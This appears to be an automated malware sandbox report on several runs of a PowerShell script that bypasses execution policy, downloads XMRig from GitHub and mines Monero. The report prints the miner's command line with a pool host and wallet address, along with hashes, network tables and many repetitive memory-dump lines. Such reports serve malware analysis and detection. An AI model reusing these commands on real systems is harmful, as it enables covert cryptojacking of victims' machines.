memory/1736-134-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-135-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-136-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-137-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-138-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-139-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-140-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-141-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-142-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-143-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-144-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-145-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-146-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-147-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-148-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-149-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-150-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-151-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-152-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-153-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-154-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-155-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-156-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-157-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-158-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-159-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-160-0x00007FF614920000-0x00007FF615553000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:09
Platform
win11-20240419-en
Max time kernel
1765s
Max time network
1777s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
Files
memory/2440-0-0x00007FF8A3873000-0x00007FF8A3875000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ttbimhkb.tdq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2440-9-0x000001A87C190000-0x000001A87C1B2000-memory.dmp
memory/2440-10-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp
memory/2440-11-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp
memory/2440-12-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp
memory/2440-13-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp
memory/2440-14-0x00007FF8A3873000-0x00007FF8A3875000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:14
Platform
win7-20240508-en
Max time kernel
1559s
Max time network
1559s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
Network
Files
memory/1252-4-0x000007FEF57EE000-0x000007FEF57EF000-memory.dmp
memory/1252-5-0x000000001B6E0000-0x000000001B9C2000-memory.dmp
memory/1252-6-0x0000000001E00000-0x0000000001E08000-memory.dmp
memory/1252-7-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp
memory/1252-9-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp
memory/1252-10-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp
memory/1252-11-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp
memory/1252-8-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp
memory/1252-12-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:16
Platform
win11-20240508-en
Max time kernel
1742s
Max time network
1751s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/2628-0-0x00007FFD081D3000-0x00007FFD081D5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d0u44g2s.p3r.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2628-9-0x00000233FA960000-0x00000233FA982000-memory.dmp
memory/2628-10-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp
memory/2628-11-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp
memory/2628-12-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp
memory/2628-13-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp
memory/2628-14-0x00007FFD081D3000-0x00007FFD081D5000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:16
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 600 wrote to memory of 924 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 600 wrote to memory of 924 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
| US | 20.231.121.79:80 | | tcp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
Files
memory/600-4-0x00007FF85FEF3000-0x00007FF85FEF4000-memory.dmp
memory/600-5-0x000001CD6DA20000-0x000001CD6DA42000-memory.dmp
memory/600-6-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp
memory/600-9-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp
memory/600-10-0x000001CD6DBF0000-0x000001CD6DC66000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f2exdr3m.1y4.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/600-25-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp
memory/600-48-0x000001CD6DF70000-0x000001CD6DF82000-memory.dmp
memory/600-61-0x000001CD6DAB0000-0x000001CD6DABA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/924-90-0x00000139DF730000-0x00000139DF750000-memory.dmp
memory/924-91-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-92-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/600-93-0x00007FF85FEF3000-0x00007FF85FEF4000-memory.dmp
memory/600-94-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp
memory/600-95-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp
memory/924-96-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-97-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-98-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-99-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-100-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-101-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-102-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-103-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-104-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-105-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-106-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-107-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-108-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-109-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-110-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-111-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-112-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-113-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-114-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-115-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-116-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-117-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-118-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-119-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-120-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-121-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-122-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-123-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-124-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-125-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-126-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-127-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-128-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-129-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-130-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-131-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-132-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-133-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-134-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-135-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-136-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-137-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-138-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-139-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-140-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-141-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-142-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-143-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-144-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-145-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-146-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-147-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-148-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-149-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-150-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-151-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-152-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-153-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-154-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-155-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-156-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 15:50
Platform
win10v2004-20240426-en
Max time kernel
1797s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1396 wrote to memory of 4012 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1396 wrote to memory of 4012 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 152.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.143.182.52.in-addr.arpa | udp |
Files
memory/1396-0-0x00007FFA6C4E3000-0x00007FFA6C4E5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jswlmnae.hiq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1396-10-0x0000022F67E70000-0x0000022F67E92000-memory.dmp
memory/1396-11-0x00007FFA6C4E0000-0x00007FFA6CFA1000-memory.dmp
memory/1396-12-0x00007FFA6C4E0000-0x00007FFA6CFA1000-memory.dmp
memory/1396-14-0x00007FFA6C4E0000-0x00007FFA6CFA1000-memory.dmp
memory/1396-15-0x0000022F68240000-0x0000022F68252000-memory.dmp
memory/1396-16-0x0000022F67430000-0x0000022F6743A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4012-47-0x000002434E1D0000-0x000002434E1F0000-memory.dmp
memory/4012-48-0x000002434F940000-0x000002434F960000-memory.dmp
memory/4012-49-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-51-0x000002434F980000-0x000002434F9A0000-memory.dmp
memory/4012-50-0x000002434F960000-0x000002434F980000-memory.dmp
memory/4012-52-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/1396-53-0x00007FFA6C4E0000-0x00007FFA6CFA1000-memory.dmp
memory/1396-54-0x00007FFA6C4E3000-0x00007FFA6C4E5000-memory.dmp
memory/4012-55-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/1396-56-0x00007FFA6C4E0000-0x00007FFA6CFA1000-memory.dmp
memory/4012-59-0x000002434F980000-0x000002434F9A0000-memory.dmp
